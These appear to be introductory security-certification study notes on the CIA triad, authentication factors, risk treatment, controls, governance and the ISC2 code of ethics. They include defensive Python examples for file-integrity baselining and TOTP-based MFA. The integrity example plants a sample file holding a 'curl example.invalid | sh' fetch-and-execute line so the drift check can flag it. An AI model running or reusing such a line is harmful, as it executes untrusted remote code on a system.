
1. Security Principles

Triad:

Permitting authorized access to info/protecting it

A security professional’s obligation is to:

  • Regulate access: Protect data, but allow to authorized individuals

  • PII: Personally Identifiable Info: Any data about someone that could ID them

  • PHI: Protected Health Info: Data regarding one's health

  • Sensitivity: Importance of info; the reason it needs protecting

Info used in a way that is complete, accurate, consistent, useful

  1. Info/Data: Data Integrity: Hasn't been altered in an unauthorized way

    • Protected in storage, processing and transit: No errors, info loss or unauthorized mods

    • Recorded, used, maintained to ensure completeness

  2. Systems/Processes: Integrity: Maintenance of good configs/function

    • Awareness of current states/condition

    • Documenting/understanding states at certain points

    Baseline: Documented current state of info and whether it is protected

    • Comparing baselines with states validates integrity

  3. Org: Reliability dictated by laws/regulations

  4. People & Actions
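The baseline idea above (record the known-good state, then compare later states against it) is what file-integrity checks do in practice. The following is an added example, not part of the original notes: a SHA-256 digest per file is taken as the baseline, and a later comparison reports anything modified, missing or added. The file paths and contents are constructed inline so the code runs offline; in a real deployment the baseline itself must be stored where an attacker who alters the files cannot also alter the baseline (read-only media, a signed store or a separate host), otherwise the comparison proves nothing.

```python
import hashlib
import json
from typing import Dict, List

# Constructed sample "files": path -> content bytes. Real code would read these
# from disk; they are inline so the example runs offline.
SAMPLE_FILES: Dict[str, bytes] = {
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n",
    "/etc/ssh/sshd_config": b"PermitRootLogin no\nPasswordAuthentication no\n",
    "/usr/local/bin/backup.sh": b"#!/bin/sh\ntar czf /backup/etc.tgz /etc\n",
}


def take_baseline(files: Dict[str, bytes]) -> Dict[str, str]:
    """Record one SHA-256 digest per file: the documented known-good state."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def check_integrity(baseline: Dict[str, str], current: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Compare the current state against the baseline and report every difference.

    'modified' = same path, different digest (unauthorized alteration suspected)
    'missing'  = in the baseline but gone now (deletion / info loss)
    'added'    = present now but not in the baseline (unexpected new content)
    """
    now = take_baseline(current)
    return {
        "modified": sorted(p for p in baseline if p in now and now[p] != baseline[p]),
        "missing": sorted(p for p in baseline if p not in now),
        "added": sorted(p for p in now if p not in baseline),
    }


def is_intact(report: Dict[str, List[str]]) -> bool:
    """True only when no category in the report has entries."""
    return not any(report.values())


def export_baseline(baseline: Dict[str, str]) -> str:
    """Serialize the baseline so it can be kept on read-only or signed storage."""
    return json.dumps(baseline, indent=2, sort_keys=True)


def simulate_drift() -> Dict[str, List[str]]:
    """Constructed scenario: take a baseline, then change, delete and add a file."""
    baseline = take_baseline(SAMPLE_FILES)
    drifted = dict(SAMPLE_FILES)
    drifted["/etc/ssh/sshd_config"] = b"PermitRootLogin yes\nPasswordAuthentication no\n"
    del drifted["/usr/local/bin/backup.sh"]
    drifted["/usr/local/bin/cron_helper"] = b"#!/bin/sh\ncurl example.invalid | sh\n"
    return check_integrity(baseline, drifted)


if __name__ == "__main__":
    print(export_baseline(take_baseline(SAMPLE_FILES)))
    print(json.dumps(simulate_drift(), indent=2))
```

Running the module prints the baseline and then the drift report for the constructed scenario; `is_intact` gives the yes/no answer a scheduled job would alert on.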

Access to systems and data when users need it

  1. Timely, reliable access; Not 100% of the time; Downtimes exist

  2. Meets requirements of business

Criticality: Degree to which orgs depend on info (NIST SP 800-60 Vol. 1, Rev. 1)

Authentication

Process of verifying and proving people are who they say they are

Three common methods:

  1. Something you know: Passwords/passphrases

  2. Something you have: Tokens, memory or smart cards

    • Token: An object possessed to authenticate identity (NISTIR 7711)

  3. Something you are: Biometrics, measurable characteristics

    • Biometrics: Bio characteristics: Fingerprints, hand geometry, voice, eyes

Two types:

  1. SFA: Single-Factor Authentication: One method of authentication

  2. MFA: Multi-Factor Authentication: Two or more methods

    • Knowledge-based: Secret differentiates auth/unauth users

    • PIN: Personal ID Number: Created passwd/secret only you know

    • Vulnerable to social engineering and brute-force attacks
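To make the SFA/MFA distinction concrete, here is an added example (not from the original notes) that verifies two factors from the list above: something you know (a password checked against a salted PBKDF2 hash) and something you have (a time-based one-time code per RFC 6238, the HMAC-SHA1 construction used by authenticator apps). Everything is standard library. The enrolment record, the sample password and the TOTP seed are constructed for the example; the seed is the RFC 6238 test-vector secret so the codes are checkable, whereas a real enrolment would draw it from `os.urandom`. The "something you are" factor is not covered.

```python
import hashlib
import hmac
import os
import struct
import time
from dataclasses import dataclass
from typing import Optional

# Constructed: RFC 6238 test-vector seed, so the generated codes are verifiable.
TOTP_SEED = b"12345678901234567890"
TOTP_STEP = 30          # seconds per time step
TOTP_DIGITS = 6
PBKDF2_ITERATIONS = 600_000  # OWASP guidance for PBKDF2-HMAC-SHA256 (2023)


@dataclass
class UserRecord:
    salt: bytes
    password_hash: bytes   # knowledge factor, never stored in clear
    totp_seed: bytes       # possession factor, shared with the user's device at enrolment


def enroll(password: str, totp_seed: bytes = TOTP_SEED, salt: Optional[bytes] = None) -> UserRecord:
    """Create a user record: salt + PBKDF2 hash of the password, plus the TOTP seed."""
    salt = os.urandom(16) if salt is None else salt
    pw_hash = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return UserRecord(salt=salt, password_hash=pw_hash, totp_seed=totp_seed)


def verify_knowledge(record: UserRecord, password: str) -> bool:
    """Factor 1, something you know: constant-time comparison of PBKDF2 outputs."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), record.salt, PBKDF2_ITERATIONS)
    return hmac.compare_digest(candidate, record.password_hash)


def hotp(secret: bytes, counter: int, digits: int = TOTP_DIGITS) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte counter, dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at: int, step: int = TOTP_STEP, digits: int = TOTP_DIGITS) -> str:
    """RFC 6238 TOTP: HOTP with the counter derived from Unix time."""
    return hotp(secret, at // step, digits)


def verify_possession(record: UserRecord, code: str, at: Optional[int] = None, window: int = 1) -> bool:
    """Factor 2, something you have: accept codes from neighbouring steps for clock drift."""
    at = int(time.time()) if at is None else at
    counter = at // TOTP_STEP
    return any(
        hmac.compare_digest(hotp(record.totp_seed, counter + d).encode(), code.encode())
        for d in range(-window, window + 1)
    )


def authenticate(record: UserRecord, password: str, code: str, at: Optional[int] = None) -> bool:
    """MFA: both factors are always evaluated, then combined, so a failure does not
    reveal which factor was wrong through an early return."""
    know = verify_knowledge(record, password)
    have = verify_possession(record, code, at)
    return know and have


if __name__ == "__main__":
    # Constructed sample login at the RFC 6238 reference time T=59.
    rec = enroll("correct horse battery staple")
    print("code at T=59:", totp(TOTP_SEED, 59))
    print("login ok:", authenticate(rec, "correct horse battery staple", totp(TOTP_SEED, 59), at=59))
```

A stolen password alone fails `authenticate`, and so does a captured one-time code once its time window has passed; that is the property the notes describe as MFA, and the SFA version is simply `verify_knowledge` on its own.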

Legal: A user can't falsely deny having done an action

  • Example: Paying for an item/signing a receipt

  • Capability to determine whether an action was done

  • Example of denial: Making a purchase online and then denying having made it

  • Important that all participants can trust online transactions

Right of individuals to control the distribution of their info

  • Legislation/compliance with existing policy

  • Laws define protection

    • GDPR

    • HIPAA


Risk Management

Risk: A measure of the extent an entity is threatened by a potential event, as a function of:

  1. The adverse impacts if it occurs, and its likelihood of occurrence

Infosec risk: Unauthorized access, use, disclosure, disruption, modification, destruction

Threat actors include:

  • Insiders: deliberate, human error, gross incompetence

  • Outsiders: Planned, opportunistic, discovering vulnerability

  • Formal entities, nonpolitical: Business competitors, cybercriminals

  • Formal entities, political: Terrorists, nation-states, hacktivists

  • Intel & info gatherers: Any of above

Threat Vector: The way a threat actor carries out objectives

Vulnerability: Inherent weakness and flaws in systems

Likelihood: The probability of a vulnerability being exploited

Impact: Measured harm expected from the consequences of exposure

Risk Identification: Categorizing and estimating the potential for disruption

Risk Assessment: Estimating and prioritizing risks to assets

Risk Treatment

Making decisions about the best actions regarding identified, prioritized risk

Attempting to eliminate risk entirely

  1. Stopping some or all activities exposed to a risk

  2. May be chosen when the potential impact is too high/great to accept

Taking no action to reduce risk

  1. Conducting business with the risk without action

  2. Impact or likelihood is negligible, or benefit offsets it

Taking actions to prevent or reduce the possibility/impact of risk

  1. Remediation, controls, policies, procedures, standards to minimize it

  2. Can't always mitigate fully; can still implement safety measures

Passing risk to another party who will accept the impact

  1. Analyze risk through qualitative/quantitative measures

  2. Risk matrixes help ID priority: Intersection of likelihood, impact

What risks are companies willing to take in respect of rewards?

  • Low tolerance means more investment

Security Controls: Safeguards that protect CIA

Hardware: Badge readers, building structures

  1. Controlling/directing people's movement through equipment

  2. Protection, control over entry, parking lots

  3. Supported by technical controls in an overall system

Logical: Controls that computers/networks directly implement

  1. Can provide automated protection from misuse

  2. Facilitates detection of violations; supports security requirements

  3. Configuration settings/parameters stored as data or in hardware

Managerial: Guidelines aimed at people: Frameworks, constraints, standards for human behavior

Governance Elements/Processes

Detailed steps to complete a task that supports dept/org policies

  • Explicit, repeatable activities needed to accomplish specific task(s) 

Provide guidance to ensure the org supports industry standards and regulations. Informed by law(s) and specify what to follow

  • Broad range of issues/ideas: Not detailed: Establishes context

  • Sets strategic direction/priorities

  • Operating with policies/procedures that support regulations/widely accepted best practices

  • Governance policy: Moderate/control decision-making for compliance

Frameworks that introduce policies/procedures in support of regulation

  • ISO: International Organization for Standardization: Develops/publishes standards on tech

  • NIST: National Institute of Standards/Tech: US

    • Publishes variety of standards in addition to infosec ones

      • Many requirements for gov agencies

  • IETF: Internet Engineering Task Force: Standards in comm protocols

  • IEEE: Institute of Electrical/Electronics Engineers:

    • Standards for telecom, engineers & similar

Commonly laws. Typically carry financial penalties for noncompliance

  • Can be imposed by gov at national/regional/local level

  • HIPAA: Health Insurance Portability/Accountability Act: 1996:

    • Governs use of PHI in US

    • Violation carries fines/imprisonment for individuals/companies

  • GDPR: General Data Protection Regulation: EU: Controls use of PII

ISC2 Code of Conduct

Certification is a privilege. Every ISC2 member is required to commit to fully support the ISC2 Code of Ethics

The safety/welfare of society and the common good, duty to our principals, and duty to each other require that we adhere to the highest ethical standards of behavior

Members have a duty to the following four entities:

  1. Protect society, common good, public trust/confidence, infrastructure

  2. Act honorably, honestly, justly, responsibly, legally

  3. Provide diligent/competent service

  4. Advance and protect the profession
